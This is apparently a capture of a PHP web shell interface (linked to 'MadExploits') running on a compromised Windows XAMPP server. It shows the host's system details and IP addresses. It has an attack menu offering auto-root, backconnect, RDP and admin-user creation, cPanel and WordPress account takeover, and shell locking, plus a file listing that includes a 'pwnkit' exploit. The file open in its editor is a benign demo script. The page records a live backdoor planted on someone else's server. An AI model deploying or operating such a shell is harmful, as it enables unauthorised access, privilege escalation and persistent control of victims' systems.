Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 3.135.212.80
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
contrib /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
BabelSans-B.fdb
39.25
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
cds.xml
368
B
-rw-rw-rw-
dom.php
1.4
KB
-rw-rw-rw-
ftp-mit-perl.pl
275
B
-rw-rw-rw-
ftp-mit-php.php
1.16
KB
-rw-rw-rw-
interbase.php
754
B
-rw-rw-rw-
interbase.pl
1016
B
-rw-rw-rw-
mingstats.html
698
B
-rw-rw-rw-
mingstats_swf.php
2.84
KB
-rw-rw-rw-
mysql.php
644
B
-rw-rw-rw-
mysql.pl
970
B
-rw-rw-rw-
oracle.php
918
B
-rw-rw-rw-
oracle.pl
960
B
-rw-rw-rw-
postgresql.php
1006
B
-rw-rw-rw-
postgresql.pl
986
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
sax.php
1
KB
-rw-rw-rw-
soap.php
677
B
-rw-rw-rw-
sql2xml.php
211
B
-rw-rw-rw-
sqlite.php
745
B
-rw-rw-rw-
sqlite.pl
962
B
-rw-rw-rw-
testperldbi.pl
465
B
-rw-rw-rw-
xmlrss.php
572
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dom.php
<?php $dom = new DOMDocument('1.0', 'iso-8859-1'); $root = $dom->createElement('cds'); $dom->appendChild($root); mysql_connect("localhost","root",""); mysql_select_db("cdcol"); $result=mysql_query("SELECT id,titel,interpret,jahr FROM cds ORDER BY interpret;"); while( $row=mysql_fetch_array($result) ) { $cd = $dom->createElement('cd'); $cd->setAttribute('id', $row['id']); $titel = $dom->createElement('titel'); $titel->appendChild($dom->createTextNode($row['titel'])); $cd->appendChild($titel); $interpret = $dom->createElement('interpret'); $interpret->appendChild($dom->createTextNode($row['interpret'])); $cd->appendChild($interpret); $jahr = $dom->createElement('jahr'); $jahr->appendChild($dom->createTextNode($row['jahr'])); $cd->appendChild($jahr); $root->appendChild($cd); } header("Content-Type: text/xml;"); $xml="<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?> <rss version=\"2.0\" xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\" xmlns:admin=\"http://webns.net/mvcb/\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:slash=\"http://purl.org/rss/1.0/modules/slash/\" xmlns:wfw=\"http://wellformedweb.org/CommentAPI/\" xmlns:content=\"http://purl.org/rss/1.0/modules/content/\"> <channel> "; echo $xml; print $dom->saveXML(); echo "</channel></rss>"; ?>
Close